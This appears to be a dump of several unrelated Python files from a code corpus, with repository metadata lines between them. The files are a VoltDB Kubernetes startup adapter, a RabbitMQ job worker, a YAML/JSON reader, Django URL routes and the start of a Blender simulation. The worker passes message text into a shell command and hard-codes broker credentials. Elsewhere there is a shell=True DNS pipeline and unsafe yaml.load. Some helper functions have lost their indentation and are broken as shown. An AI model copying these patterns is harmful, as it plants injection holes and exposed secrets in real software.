    Raises BadRequest when a mandatory sub-object is missing, or when a
    present sub-object is not a JSON object.
    """
    if name in req:
        sub = req[name]
    else:
        if mandatory:
            raise BadRequest(name + ' object is required')
        sub = {}
    if type(sub) != type({}):
        raise BadRequest(name + ' must be a JSON object {...}')
    arg_list = normalize_args(_json_array(sub, 'args'))
    cmd_name = _json_string(sub, 'name')
    return (arg_list, cmd_name)
def _json_array(obj, name):
arr = obj[name] if name in obj else []
if type(arr) != type([]):
raise BadRequest(name + ' must be a JSON array [...]')
return arr
def _json_string(obj, name):
txt = obj[name] if name in obj else ''
if type(txt) != type('') and type(txt) != type(u''):
raise BadRequest(name + ' must be a JSON string "..."')
return txt
def init_and_start(start_cmd, restart_cmd):
    """Handle a /start request: initialize VoltDB if needed, start it, and
    remember the restart command for later automatic restarts.

    start_cmd, restart_cmd: (args, name) tuples as built by command_parts().
    Raises BadRequest for client-side errors and InternalServerError for
    init/start failures; the global STATE is moved to ST_STARTFAIL when a
    start attempt fails.
    """
    try:
        start_args = start_cmd[0]
        start_name = start_cmd[1]
        restart_args = restart_cmd[0]
        restart_name = restart_cmd[1]
        check_forbidden_args(start_args)
        check_forbidden_args(restart_args)
        # A start is only valid when the database is not already (becoming) active.
        if STATE == ST_RUNNING or STATE == ST_STARTING:
            raise BadRequest("Start not valid in state '%s'" % STATE)
        # First ever start on this volume: create the voltdbroot first.
        if STATE == ST_UNINIT:
            init_voltdb()
        set_state(ST_STARTING)
        start_voltdb(start_args, start_name)
        # Persist the restart command only after a successful start.
        save_restart_cmd(restart_args, restart_name)
    except ForbiddenArgException as e:
        raise BadRequest(e.args[0])
    except VoltInitException as e:
        raise InternalServerError(e.args[0])
    except VoltStartException as e:
        set_state_if(ST_STARTING, ST_STARTFAIL)
        raise InternalServerError(e.args[0])
    except BadRequest:
        raise
    except Exception as e:
        logging.error("Unexpected exception: %s", e)
        set_state_if(ST_STARTING, ST_STARTFAIL)
        raise InternalServerError("Unexpected exception", e.args[0], e)
def auto_restart(restart_args, restart_name):
    """Restart VoltDB at pod startup from a previously-saved restart command.

    Called from startup when a restart-command file was loaded; mirrors the
    error handling of init_and_start() but never re-initializes the database.
    """
    try:
        set_state(ST_STARTING)
        start_voltdb(restart_args, restart_name)
    except VoltStartException as e:
        set_state_if(ST_STARTING, ST_STARTFAIL)
        raise InternalServerError(e.args[0])
    except Exception as e:
        logging.error("Unexpected exception: %s", e)
        set_state_if(ST_STARTING, ST_STARTFAIL)
        raise InternalServerError("Unexpected exception", e.args[0], e)
####
# VoltDB initialization
def init_voltdb(force=False):
    """Run 'voltdb init' to create a fresh database root on the persistent volume.

    Creates a uniquely-named working directory in the PV root, points the
    stateful-set symlink at it, and runs 'voltdb init' there, passing along
    any deployment/classes/schema assets found under ASSETS_DIR.
    Leaves the process chdir'ed into WORKING_DIR on success.
    Raises VoltInitException on any failure.
    """
    logging.info("Initializing a new VoltDB database in '%s'", WORKING_DIR)
    ssname, pod_ordinal, my_hostname, domain = HOSTINFO
    # Remove any old symlink
    os.chdir(PV_MOUNTPT)
    try:
        os.unlink(ssname)
    except:
        pass
    # Create working dir with arbitrary but unique name
    workdir_unique = 'VDBR-' + str(pod_ordinal) + '-' + str(int(time()*1e6)) + '.' + domain
    os.mkdir(workdir_unique)
    # Add symlink to PV root
    os.symlink(workdir_unique, ssname)
    # Construct voltdb command string
    os.chdir(workdir_unique)
    cmd = ['voltdb', 'init']
    if force:
        cmd.append('--force')
    if os.path.isdir(ASSETS_DIR):
        deployment_file = os.path.join(ASSETS_DIR, 'deployment')
        if os.path.isfile(deployment_file):
            cmd.append('--config')
            cmd.append(deployment_file)
        # NOTE(review): the classes/schema subdirectories are assumed to
        # exist whenever ASSETS_DIR does -- os.listdir inside
        # get_files_list would raise otherwise; confirm against deployment.
        classes_dir = os.path.join(ASSETS_DIR, 'classes')
        l = get_files_list(classes_dir)
        if l is not None:
            cmd.append('--classes')
            cmd.append(','.join(l))
        schema_dir = os.path.join(ASSETS_DIR, 'schema')
        l = get_files_list(schema_dir)
        if l is not None:
            cmd.append('--schema')
            cmd.append(','.join(l))
    # Run voltdb and wait for it to finish (does local
    # work only, so wait should not be too long)
    logging.info("Executing VoltDB init command: %s", cmd)
    logging.info(" in working directory: %s", os.getcwd())
    sys.stdout.flush()
    sys.stderr.flush()
    try:
        sp = subprocess.Popen(cmd, shell=False)
        sp.wait()
    except Exception as e:
        raise VoltInitException("Failed to run 'voltdb init' command: %s" % e)
    if sp.returncode != 0:
        raise VoltInitException("Failed to initialize VoltDB database in '%s'" % WORKING_DIR)
    # The marker file is how later startups detect an initialized volume.
    marker = os.path.join(WORKING_DIR, VOLTDBROOT, '.initialized')
    if not os.path.exists(marker):
        raise VoltInitException("VoltDB initialization succeeded but marker file '%s' was not created" % marker)
    logging.info("Initialization of new VoltDB database is complete")
    setup_logging(ssname) # logging changes to use new directory
    os.chdir(WORKING_DIR)
    logging.info("Working directory is now: %s", WORKING_DIR)
    # Create scratch directory for voltboot
    os.mkdir(VOLTBOOT_DIR)
def get_files_list(dir):
    """Return the file arguments to pass to 'voltdb init' for one asset dir.

    - no usable files: None
    - exactly one file: its full path
    - several files with a '.loadorder' manifest (a single comma-separated
      line of names): the named paths, in manifest order
    - several files without a manifest: a single shell-style glob 'dir/*'

    Entries starting with '..' (k8s configmap bookkeeping such as '..data')
    are ignored. Note '.loadorder' itself still counts toward the file total,
    matching the original behavior.

    Fix: the ordered-path list is materialized with a list comprehension;
    the previous bare map() returned a one-shot lazy iterator under
    Python 3.
    """
    # skip files starting with .., such as ..data, that k8s puts in configmaps
    files = [f for f in os.listdir(dir) if not f.startswith('..')]
    if len(files) > 1:
        plf = os.path.join(dir, '.loadorder')
        if os.path.exists(plf):
            with open(plf, 'r') as f:
                fl = f.readline().strip().split(',')
            return [os.path.join(dir, x) for x in fl]
        return [ dir + '/*', ]
    elif len(files) == 1:
        return [ os.path.join(dir, files[0]) ]
    return None
###
# Start VOLTDB running in subprocess
# State is set to STARTING prior to entry
# and will be RUNNING or STARTFAIL on return
def start_voltdb(args, name):
    """Launch 'voltdb start' in a subprocess and monitor it.

    The caller sets STATE to ST_STARTING before entry; on return the state
    is ST_RUNNING, or ST_STARTFAIL if the process died immediately. A daemon
    thread then watches the subprocess and asynchronously moves the state to
    ST_STOPPED (clean exit) or ST_CRASHED (abnormal exit).
    Raises VoltStartException when the process cannot be launched or
    terminates during the initial START_WAIT grace period.
    """
    global STARTED_NAME
    STARTED_NAME = name
    # Find hosts in our cluster
    ssname, pod_ordinal, my_hostname, domain = HOSTINFO
    connect_hosts = discover_pods(FQHOSTNAME, domain, ssname, pod_ordinal)
    # Override some command arguments
    if os.path.isdir(ASSETS_DIR):
        license_file = os.path.join(ASSETS_DIR, 'license') # FIXME license handling moves to init soon
        if os.path.isfile(license_file): # TODO: this causes problems somewhere... dave to figure it out
            add_or_replace_arg(args, '-l,--license', license_file)
    add_or_replace_arg(args, '-H,--host', random.choice(connect_hosts))
    add_or_replace_arg(args, '--status', str(VOLTDB_STATUS_PORT))
    # In voltdbroot/config/path.properties the paths may contain
    # references to voltdbroot. Ensure they always use the correct
    # symlink. The file is rewritten atomically via a temp file + rename.
    propdir = os.path.join(VOLTDBROOT, 'config')
    propfile = os.path.join(VOLTDBROOT, 'config', 'path.properties')
    res = '=(.*)/.+?\.' + domain.replace('.','\.') +'/'
    cre = re.compile(res, flags=re.MULTILINE)
    with open(propfile, 'r') as f:
        lines = f.read()
    if len(lines) == 0:
        raise VoltStartException("File '%s' is empty" % propfile)
    lines = cre.sub('=\g<1>/'+ssname+'/', lines)
    tfd, tmpfilepath = mkstemp(dir=propdir)
    with os.fdopen(tfd, 'w') as f2:
        f2.write(lines)
    os.rename(tmpfilepath, propfile)
    # Build the voltdb start command line
    cmd = ['voltdb', 'start']
    cmd.extend(args)
    logging.info("Executing VoltDB start command: %s", cmd)
    logging.info(" in working directory: %s", os.getcwd())
    # Flush so we see our output in k8s logs
    sys.stdout.flush()
    sys.stderr.flush()
    # Start voltdb in subprocess (voltdb cli eventually
    # execs the actual VoltDB program in a JVM)
    try:
        sp = subprocess.Popen(cmd, shell=False)
    except Exception as e:
        raise VoltStartException("Failed to run 'voltdb start' command: %s" % e)
    # Wait a little to see if voltdb starts ok
    t0 = time()
    while True:
        if sp.poll() is not None:
            set_state(ST_STARTFAIL)
            raise VoltStartException("VoltDB was started and immediately terminated")
        if time()-t0 >= START_WAIT:
            break
        sleep(0.5)
    logging.info("VoltDB started as process id %d", sp.pid)
    set_state(ST_RUNNING)
    # Now run a monitoring thread. This may asynchronously
    # change the state to show that VoltDB has terminated.
    def voltdb_monitor(proc):
        # Blocks for the lifetime of the VoltDB process.
        logging.debug("Monitoring thread started")
        excode = None
        try:
            excode = proc.wait()
        except Exception as e:
            logging.error("Monitoring thread error: %s", e)
            excode = -1
        if excode == 0:
            logging.info("VoltDB process terminated normally")
            set_state_if(ST_RUNNING, ST_STOPPED)
        else:
            logging.error("VoltDB process terminated abnormally")
            set_state_if(ST_RUNNING, ST_CRASHED)
        logging.debug("Monitoring thread terminated")
    th = Thread(target=voltdb_monitor, args=(sp,))
    th.daemon = True
    th.start()
# Find nodes which have the mesh port open and which respond to HTTP traffic
# Nodes may be "published before they are ready to receive traffic"
def discover_pods(fqhostname, domain, ssname, pod_ordinal):
    """Find cluster peers suitable as the 'voltdb start --host' target.

    Returns every node answering on the HTTP port when the database is
    already up, or [host-0] when the mesh is still forming and enough peers
    (>= our pod ordinal) have their mesh port open. Polls DNS once per
    second until a usable answer appears.
    Raises VoltStartException if our own DNS record never shows up within
    DNS_WAIT seconds.
    """
    # An explicit connection host (e.g. for testing) bypasses discovery.
    if VOLTDB_CONNECTION_HOST is not None:
        cluster_pods_up = [VOLTDB_CONNECTION_HOST]
        return cluster_pods_up
    tstart = time()
    tlog = 0
    seen_own_name = False
    logging.info("This is %s-%s", ssname, pod_ordinal)
    while True:
        cluster_pods = query_dns_srv(domain)
        if fqhostname in cluster_pods: # remove ourself
            cluster_pods.remove(fqhostname)
            if not seen_own_name:
                logging.info("Own name seen in DNS results: %s", fqhostname)
                seen_own_name = True
        cluster_pods_responding_mesh = []
        cluster_pods_up = []
        # Test connectivity to all named pods
        for host in cluster_pods:
            logging.info("Testing connection to '%s'", host)
            if try_to_connect(host, VOLTDB_INTERNAL_INTERFACE):
                cluster_pods_responding_mesh.append(host)
                # We may have found a running node, try the HTTP API
                if try_to_connect(host, VOLTDB_HTTP_PORT):
                    cluster_pods_up.append(host)
        logging.debug("Database nodes up: %s", cluster_pods_up)
        logging.debug("Mesh ports responding: %s", cluster_pods_responding_mesh)
        # If the database is up use all that are available
        if len(cluster_pods_up) > 0:
            return cluster_pods_up
        # If the database is down
        # - forming initial mesh we direct the connection request to host0
        # - bring up pods in an orderly fashion, one at a time
        mesh_count = len(cluster_pods_responding_mesh)
        if mesh_count >= pod_ordinal:
            logging.debug("Mesh count %d >= pod ordinal %d", mesh_count, pod_ordinal)
            return [ ssname + '-0.' + domain ]
            # NOTE(review): this break is unreachable -- the return above
            # always fires first.
            break
        # If we haven't seen our own name after a few seconds,
        # surely something is broken.
        tnow = time()
        if not seen_own_name and tnow > tstart + DNS_WAIT:
            raise VoltStartException("DNS results don't contain our name: %s" % fqhostname)
        # Log lack of progress, but infrequently
        if tnow > tlog + 30:
            logging.info("Waiting for mesh to form")
            tlog = tnow
        sleep(1)
# DNS lookup. Voltdb stateful set pods are registered on startup not on readiness.
# SRV gives us records for each node in the cluster domain like
# _service._proto.name. TTL class SRV priority weight port target.
# Returns a list of fq hostnames of pods in the service domain
def query_dns_srv(query):
    """Look up the SRV records for 'query' via nslookup and return a sorted
    list of the fully-qualified pod hostnames they target.

    Returns [] on any lookup error. Each SRV answer's last field is the
    target name; the trailing '.' is stripped.
    """
    m_list = []
    try:
        logging.debug("DNS lookup: %s", query)
        # NOTE(review): 'query' is interpolated into a shell pipeline.
        # It is derived from this pod's own DNS domain, but must remain
        # trusted input; do not pass user-controlled strings here.
        cmd = "nslookup -type=SRV %s | awk '/^%s/ {print $NF}'" % ((query,)*2)
        answers = subprocess.check_output(cmd, shell=True)
        logging.debug("Answers: %s", answers)
    except Exception as e:
        logging.error("DNS query error: %s", e)
        return m_list
    for rdata in answers.split('\n'):
        if len(rdata):
            m_list.append(rdata.split(' ')[-1][:-1]) # drop the trailing '.'
    logging.debug("Results: %s", m_list)
    return sorted(m_list)
def try_to_connect(host, port):
    """Return True if a TCP connection to host:port succeeds, else False.

    The probe socket is always closed before returning.
    """
    probe = socket.socket()
    try:
        logging.debug("Trying to connect to '%s:%d'", host, port )
        probe.connect((host, port))
    except Exception as exc:
        logging.debug(str(exc))
        return False
    else:
        logging.debug("Connected")
        return True
    finally:
        probe.close()
####
# Restart command utilities
def update_restart_cmd(arg_list, name):
    """Validate and persist a new restart command (REST handler helper).

    Raises BadRequest when the database was never initialized or when
    arg_list contains a forbidden 'voltdb start' option; other failures
    surface as InternalServerError.
    """
    if STATE == ST_UNINIT:
        raise BadRequest("Request not valid in '%s' state" % STATE)
    try:
        if arg_list:
            check_forbidden_args(arg_list)
        save_restart_cmd(arg_list, name)
    except ForbiddenArgException as e:
        raise BadRequest(e.args[0])
    except BadRequest:
        raise
    except Exception as e:
        logging.error("Unexpected exception: %s", e)
        raise InternalServerError("Unexpected exception", e.args[0], e)
def save_restart_cmd(arg_list, name):
    """Update the in-memory restart command and mirror it to disk.

    Clearing both values removes the on-disk file; otherwise the file is
    rewritten only when something actually changed.
    """
    global RESTART_ARGS, RESTART_NAME
    if not arg_list and not name:
        RESTART_ARGS = None
        RESTART_NAME = None
        _remove_restart_file()
    elif arg_list != RESTART_ARGS or name != RESTART_NAME:
        RESTART_ARGS = arg_list
        RESTART_NAME = name
        logging.info("Restart command set: name '%s', args %s", name, arg_list)
        _write_restart_file(arg_list, name)
# Format marker written as the first line of the restart-command file;
# bump the version if the on-disk layout ever changes.
RESTART_FILE_MAGIC='##VOLT 1'
def _write_line(f, t):
if t is None:
f.write('\n')
else:
f.write(t + '\n')
def _write_restart_file(arg_list, name):
    """Persist the restart command to VOLTBOOT_DIR/restart-command.

    File layout: magic line, name line, then one argument per line.
    Failures are logged but not raised -- losing the file only disables
    automatic restart on the next pod start.
    """
    path = os.path.join(VOLTBOOT_DIR, 'restart-command')
    try:
        with open(path, 'w') as f:
            _write_line(f, RESTART_FILE_MAGIC)
            _write_line(f, name)
            if arg_list:
                for a in arg_list:
                    _write_line(f, a)
    except EnvironmentError as e:
        logging.warning("Failed to write to %s: %s", path, e)
def _remove_restart_file():
    """Delete the on-disk restart command; a missing file is not an error."""
    path = os.path.join(VOLTBOOT_DIR, 'restart-command')
    try:
        os.unlink(path)
    except EnvironmentError as e:
        if e.errno != 2: # 'file not found' is ok (errno 2 == ENOENT)
            logging.warning("Failed to remove %s: %s", path, e)
def _read_lines(f):
lines = f.readlines();
return [ line.strip() for line in lines ]
def load_restart_args():
    """Load the saved restart command from VOLTBOOT_DIR/restart-command.

    Returns (args, name); both are None when no valid file exists.
    File layout: magic line, name line, then one argument per line.

    Fix: an empty or truncated file previously raised an uncaught
    IndexError on lines[0]/lines[1] (EnvironmentError does not cover it),
    aborting pod startup; such files are now treated as invalid.
    """
    path = os.path.join(VOLTBOOT_DIR, 'restart-command')
    data = None
    name = None
    try:
        with open(path, 'r') as f:
            lines = _read_lines(f)
        if len(lines) >= 2 and lines[0] == RESTART_FILE_MAGIC:
            name = lines[1]
            data = lines[2:]
            logging.info("Loaded restart command: name '%s', args %s", name, data)
    except EnvironmentError as e:
        if e.errno == 2: # 'file not found' is ok
            logging.debug("Not found: %s", path)
        else:
            logging.warning("Failed to load %s: %s", path, e)
    return (data, name)
def restart_response(arg_list, name):
    """Build the JSON body describing a restart command; {} when unset."""
    command = {}
    if arg_list:
        command["args"] = arg_list
    if name:
        command["name"] = name
    if not command:
        return {}
    return { "restartCommand": command }
####
# Command-line parsing utilities
# Normalize args
# - if yaml file contains $(FOO) and configset does not define FOO then the args
# will contain a literal "$(FOO)" which we do not want.
# - some of our "args" might be environment strings of args; if so break them
# up for the shell
def normalize_args(args):
    """Clean up a raw argument list from the pod spec.

    - Drops unsubstituted k8s variable references such as "$(FOO)", which
      appear literally when the configset does not define FOO.
    - Splits arguments that are really whole shell strings (contain spaces)
      into individual tokens via str_to_arg_list().

    Fix: the exit debug line previously logged the input list instead of
    the normalized result.
    """
    logging.debug("normalize_args in: %s", args)
    nargs = []
    omit = re.compile(r'^\$\(\w+\)$')
    for a in args:
        if omit.match(a):
            logging.info("Omitting unsubstituted variable: %s", a)
        elif ' ' in a:
            nargs.extend(str_to_arg_list(a))
        else:
            nargs.append(a)
    logging.debug("normalize_args out: %s", nargs)
    return nargs
# Replaces "foo bar=mumble" by [foo, bar, mumble]
def str_to_arg_list(text):
    """Split a shell-style argument string into an argument list.

    "foo bar=mumble" becomes ['foo', 'bar', 'mumble']: surrounding quotes
    are stripped, tokens are split with shlex, and the first '=' inside a
    token acts as a separator.
    """
    logging.debug("str_to_arg_list in: %s", text)
    result = []
    for token in shlex.split(text.strip("'\"")):
        if '=' in token:
            result.extend(token.split('=', 1))
        else:
            result.append(token)
    logging.debug("str_to_arg_list out: %s", result)
    return result
# 'voltdb start' options that are valid for the CLI but not allowed here:
# voltboot controls directories, backgrounding, and replication itself.
FORBIDDEN_ARGS = ['--version',
                  '-h', '--help',
                  '-D', '--dir',
                  '-f', '--force',
                  '-B', '--background',
                  '-r', '--replica']
def check_forbidden_args(args):
    """Reject 'voltdb start' options that voltboot must control itself.

    Raises ForbiddenArgException listing every offending argument.
    """
    logging.debug("check_forbidden_args: %s", args)
    offending = [arg for arg in args if arg in FORBIDDEN_ARGS]
    if offending:
        suffix = '' if len(offending) == 1 else 's'
        raise ForbiddenArgException("Unsupported argument%s: %s" % (suffix, ', '.join(offending)))
def add_or_replace_arg(args, option, value):
    """Ensure 'args' carries the given option with the given value, in place.

    Option is a comma-separated list of option formats to be treated
    equally, e.g. '-L,--license'. We assume that only one of the formats is
    present at a time. If none is found, the option is appended using the
    LAST format in the list (so put the preferred long form last) followed
    by the value; otherwise the existing option's value slot is replaced
    (find_arg_index returns the index just past the option itself).
    """
    options = option.split(',')
    for op in options:
        ix = find_arg_index(args, op)
        if ix is not None:
            break
    if ix is None: # add
        args.append(op)
        args.append(value)
    else: # replace
        args[ix] = value
def find_arg_index(args, arg):
    """Return the index just past the first occurrence of arg (i.e. the
    position of its value), or None when arg is absent."""
    for position, current in enumerate(args):
        if current == arg:
            return position + 1
    return None
####
# Hostname utilities
# Hostname is like pear-1.pear.default.svc.cluster.local
# which is ssname-PODORDINAL.FQDOMAIN
def get_fqhostname():
    """Return this pod's fully-qualified hostname.

    The VOLTDB_K8S_ADAPTER_FQHOSTNAME environment variable, when set,
    overrides the system-reported name (useful for testing).
    """
    override = os.getenv('VOLTDB_K8S_ADAPTER_FQHOSTNAME')
    return socket.getfqdn() if override is None else override
def split_fqhostname(fqdn):
    """Split a stateful-set pod FQDN into its components.

    'pear-1.pear.default.svc.cluster.local' yields
    ('pear', 1, 'pear-1', 'pear.default.svc.cluster.local'):
    (statefulset-name, pod-ordinal, hostname, domain). The ordinal is an
    int when numeric, otherwise the raw string. Returns None when fqdn
    does not fit the pattern.

    Fix: the bare 'except:' also trapped SystemExit/KeyboardInterrupt;
    narrowed to Exception.
    """
    try:
        hostname, domain = fqdn.split('.', 1)
        ssp = hostname.split('-')
        pod = ssp[-1]
        if pod.isdigit(): pod = int(pod)
        hn = ('-'.join(ssp[0:-1]), pod, hostname, domain)
    except Exception:
        return None
    return hn # returns (ss-name, pod-ordinal, hostname, domain)
####
# Logging setup.
# We set up console logging to stderr, where it can be found
# by 'kubectl logs PODNAME', and to the same log file that
# VoltDB itself uses. The latter is not available before we
# have run 'voltdb init' for the first time.
def setup_logging(ssname):
    """(Re)configure root logging: always to stderr, plus VoltDB's own
    volt.log once a voltdbroot exists for this stateful set.

    Called again after 'voltdb init' so the file handler picks up the
    newly-created log directory.
    """
    logger = logging.getLogger()
    logger.setLevel(logging.NOTSET)
    logger.propagate = True
    log_format = '%(asctime)s %(levelname)-8s %(filename)14s:%(lineno)-6d %(message)s'
    formatter = logging.Formatter(log_format)
    loglevel = get_loglevel('VOLTDB_K8S_ADAPTER_LOG_LEVEL', logging.INFO)
    # Drop any handlers from a previous call before re-adding.
    logger.handlers = []
    # Console (stderr, visible via 'kubectl logs')
    console = logging.StreamHandler()
    console.setLevel(loglevel)
    console.setFormatter(formatter)
    logger.addHandler(console)
    logto = 'console'
    # And the volt log file if possible
    volt_log = find_volt_log(ssname)
    if volt_log:
        file = logging.FileHandler(volt_log, 'a')
        file.setLevel(loglevel)
        file.setFormatter(formatter)
        logger.addHandler(file)
        logto += ' and ' + volt_log
    # Note logging destination
    logging.info("Logging to %s", logto)
# Accepted VOLTDB_K8S_ADAPTER_LOG_LEVEL values mapped to logging levels.
_logmap = { 'DEBUG':logging.DEBUG, 'INFO':logging.INFO, 'WARNING':logging.WARNING, 'ERROR':logging.ERROR }
def get_loglevel(envar, deflt):
    """Map the value of environment variable 'envar' to a logging level.

    Unset or unrecognized values (case-insensitive) fall back to deflt.
    """
    raw = os.getenv(envar)
    if raw is None:
        return deflt
    return _logmap.get(raw.upper(), deflt)
def find_volt_log(ssname):
    """Return the path of VoltDB's volt.log for this stateful set, or None.

    If the file itself does not exist yet but its log directory does, the
    path is still returned so the FileHandler (opened in append mode) can
    create the file.
    """
    volt_log = os.path.abspath(os.path.join(PV_MOUNTPT, ssname, VOLTDBROOT, 'log', 'volt.log'))
    if os.path.exists(volt_log):
        return volt_log
    log_dir = os.path.abspath(os.path.join(PV_MOUNTPT, ssname, VOLTDBROOT, 'log'))
    if os.path.exists(log_dir):
        return volt_log
    return None
####
# Usual entry point
if __name__ == "__main__":
    try:
        main()
    except:
        # Last-chance handler: log the full traceback so 'kubectl logs'
        # shows why the controller died, then exit non-zero.
        logging.error("Last chance handler: %s", format_exc())
        logging.error("==TERMINATED==")
        sys.exit(-1)
| [
"george.smith@altoros.com"
] | george.smith@altoros.com | |
d0b82243f2f566c97ca61981f2fe732363eeb5ad | 90f0c803a1b905aeff9a9fc67a82267bd8711484 | /getJob.py | cbe1a3113f63ba15a914326a10f4ed9a20f27f45 | [] | no_license | cdemircioglu/ORTest | f4ee02f2f01bf10ff3c49ce063a6542cb96aeaf8 | 0a0082e1072799f679ec6b4dd985e718409b276d | refs/heads/master | 2021-01-11T02:57:56.528509 | 2016-12-22T07:00:26 | 2016-12-22T07:00:26 | 70,874,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | #!/usr/bin/env python
import pika
import sys
import subprocess
import time
import os
# Worker script (Python 2): consume job messages from the RabbitMQ queue
# named by the first command-line argument and hand each one to an R worker.
print sys.argv[1]
# NOTE(review): broker credentials are hard-coded in source; move them to
# configuration or environment variables.
credentials = pika.PlainCredentials('controller', 'KaraburunCe2')
parameters = pika.ConnectionParameters('HWLinux',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.queue_declare(queue=sys.argv[1])
def callback(ch, method, properties, body):
    # Process one job: run the R worker with the message body as argument.
    print(" [x] Received %r" % body)
    time.sleep(5)
    print(" [x] Done")
    # NOTE(review): the message body is interpolated into a shell command;
    # a body containing quotes allows command injection. Prefer
    # subprocess with a list argv and shell=False.
    os.system("/usr/bin/Rscript --vanilla RWorker_test.R \"" + body + "\"")
    # Acknowledge only after the worker finishes, so a crashed job is redelivered.
    ch.basic_ack(delivery_tag = method.delivery_tag)
# Take at most one unacknowledged message at a time.
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback,queue=sys.argv[1])
channel.start_consuming()
| [
"c81021292@china.huawei.com"
] | c81021292@china.huawei.com |
b2051e9fb5b2093734a94ebbbb2b4dbcd3731a38 | 719a8b314ee5b477c8d61bd685f84f0a73310b07 | /class1/read_jsonyaml.py | be760242252464d77c2601ce4b26f1542e97f0ce | [] | no_license | jvascousa/pynet_class | e278a11c69f0f966bcd1752770fe14538802e36d | 896571dcad23447502b557f2837f96dabd4f8541 | refs/heads/master | 2021-01-11T02:22:07.186495 | 2016-10-29T23:32:02 | 2016-10-29T23:32:02 | 70,972,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | #!/usr/bin/env python
import yaml
import json
from pprint import pprint
def output_print(my_list,my_str):
    """Pretty-print my_list beneath a hash-marked banner titled my_str."""
    print '\n\n'
    print '#' * 3
    print '#' * 3 + my_str
    print '#' * 3
    pprint(my_list)
def main():
    """Load the same data from a YAML file and a JSON file and display both."""
    yaml_file = 'yaml_test.yaml'
    json_file = 'json_file.json'
    with open(yaml_file) as f:
        # NOTE(review): yaml.load without an explicit Loader can construct
        # arbitrary objects from untrusted input; yaml.safe_load is preferred.
        yaml_list = yaml.load(f)
    with open(json_file) as f:
        json_list = json.load(f)
    output_print(yaml_list,'YAML')
    output_print(json_list,'JSON')
# Run the comparison when executed directly.
if __name__ == "__main__":
    main()
| [
"jvascousa@gmail.com"
] | jvascousa@gmail.com |
874d0a89668922462ad058aefcd0701876771879 | 54e4c67cd295283532387975801c98300fcf7925 | /django_hosts_tutorial/help/urls.py | 5e4ee8bb781ffee7d48342674c80a6d34f28e82e | [] | no_license | ThusithaDeepal/Django-dynamic-subdomai-tutorial | 16ea8a71687766ed286942a988891fb8277acc0f | 0f06ce10db6aa19abcb4189ba66447debb1c97b6 | refs/heads/master | 2021-06-10T07:38:29.362445 | 2021-05-18T09:41:28 | 2021-05-18T09:41:28 | 184,202,571 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | from django.conf.urls import url,include
from help import views
urlpatterns=[
url(r'^$',views.home,name='home'),
url(r'^articles/$', views.articles, name='articles'),
] | [
"noreply@github.com"
] | noreply@github.com |
61d43a1943726db6691f8d8f151c4e7ef7359254 | 87f9f2701c6fbbb7804123dcff31760da3477be2 | /blender_scripts/tools/natural_sim.py | 3926dbec844cc7db3ab8b8827f3e3d4fd8f3ee66 | [] | no_license | syedfaizanhussain94/Simulations-master | f023bdac5135f32e17bcfa677a708fd77da8c0ed | 8d38567363102d5c896397b027b73e9d6ed585a9 | refs/heads/master | 2021-03-05T21:52:04.796320 | 2020-05-28T19:25:49 | 2020-05-28T19:25:49 | 246,155,544 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83,252 | py | #import bpy
import imp
from random import random, uniform, randrange
from copy import copy
import pickle
import bobject
imp.reload(bobject)
from bobject import *
import blobject
import helpers
imp.reload(helpers)
from helpers import *
#Sim constants
WORLD_DIMENSIONS = [150, 150]
SIM_RESOLUTION = 1 #0.25
DEFAULT_DAY_LENGTH = 600 * SIM_RESOLUTION
PREDATOR_SIZE_RATIO = 1.2 #Vals close to 1 apply strong pressure toward bigness,
#since it becomes possible to eat recent ancestors.
SPEED_ADJUST_FACTOR = 1.0 #Scale speed to keep creature speeds in the 0-2 range
#for graphing. Units are arbitrary anyway, so this is
#easier than adjusting all the distances.
SIZE_ADJUST_FACTOR = 1.0
HEADING_TARGET_VARIATION = 0.4 #Range for random heading target changes, radians
MAX_TURN_SPEED = 0.07 / SIM_RESOLUTION
TURN_ACCELERATION = 0.005 / SIM_RESOLUTION
BASE_SENSE_DISTANCE = 25
EAT_DISTANCE = 10
HELP_REP_BOOST = 0.5 #Reproduction chance improvement creatures get by helping
FAMILY_JUMPS = 3
KIN_ALTRUISM_RADIUS = 0
MUTATION_CHANCE = 0.05
MUTATION_VARIATION = 0.1
STARTING_ENERGY = 800 #1800
HOMEBOUND_RATIO = 2# 1.5
SAMARITAN_RATIO = 1.1
#Visual constants
DEFAULT_DAY_ANIM_DURATION = 4 #seconds
BLENDER_UNITS_PER_WORLD_UNIT = 1 / 40
FOOD_SCALE = 2 * BLENDER_UNITS_PER_WORLD_UNIT
BASE_CREATURE_SCALE = 0.25
CREATURE_HEIGHT = 0.65 * BASE_CREATURE_SCALE / BLENDER_UNITS_PER_WORLD_UNIT
SPEED_PER_COLOR = 0.3 #Speed change for one color unit change
DEFAULT_ANIM_DURATIONS = {
'dawn' : 0.5, #Put out food and creatures
'morning' : 0.25, #pause after setup
'day' : DEFAULT_DAY_ANIM_DURATION, #creatures go at it
'evening' : 0.25, #pause before reset
'night' : 0.5 #reset
}
'''DEFAULT_ANIM_DURATIONS = {
'dawn' : 1, #Put out food and creatures
'morning' : 0.5, #pause after setup
'day' : DEFAULT_DAY_ANIM_DURATION, #creatures go at it
'evening' : 0.5, #pause before reset
'night' : 1 #reset
}'''
"""
TODOs
- Arrange sims/graph as it will be in the video
- Work on fast-forward sims (Seems to work fine, actually)
- Rebalance using non-animated sims to get a sense for things more quickly
- Multiplying to get total cost encourages extreme tradeoffs, making the traits
that matter less (sense) into dump stats.
- Speed and size are highly competitive. There doesn't seem to be a way of
making them bimodal without a change in behavior. A slow creature might be
able to get by, but the faster creatures will multiply and quickly eat all
the food. Having small creatures run from big creatures might be a behavioral
trick to encourage multiple strategies. (You can be small if you have good
senses and speed.)
- Visual
- Make food not appear close to edge.
- Distinguish border, by covering or otherwise. Smoke?
Perhaps unnecessary
- Make creatures run from larger ones. (If can't balance)
- Break eating ties (Not sure if necessary)
- Reuse dead creature objects and old food objects
(maybe even resize/recolor for extra smoothness)
Postponing this because the childof constraints add complexity to this task
And it only affects blender's UI responsiveness (and possibly render time)
Might try again later, but not necessary now.
- Fix teleportation bugs
Food sometimes appears below the plane. Could be related to immediate eating?
Not super common, so might say meh. You can't even see it.
Parameter considerations
- Avg number of creatures. Tradeoff between simplicity/speed and stability
- Creature density. More direct competition.
